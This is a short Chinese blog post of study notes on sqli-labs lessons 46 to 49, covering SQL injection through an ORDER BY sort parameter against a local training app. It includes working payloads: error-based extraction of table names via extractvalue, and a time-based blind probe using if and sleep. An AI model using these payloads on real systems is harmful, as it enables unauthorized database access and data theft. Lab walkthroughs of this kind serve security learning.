Less46,47,48,49【order by 注入】

因为是order by 注入(查看源码),所以在查看desc和asc发现 两者显示不一样,order by 存在注入点,【order by 不允许有union注入】
DESC
ASC
 
1.and注入
直接在语句后添加and ,and后添加注入语句
2.报错注入:
and和报错一起
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e))--+
3.延时注入
?sort=1%20and%20if(ascii(substr(database(),1,1))=116,sleep(1),sleep(5))--+
 
Less47与46不同在于闭合符号,47闭合符号为'
Less48与46注入方式相同,不同在于48为盲注,需要配合延时注入
Less49与47注入方式一样,闭合符号也为' ,不同在于盲注
 
 
 
posted @ 2020-11-17 19:50  峰中追风  阅读(146)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路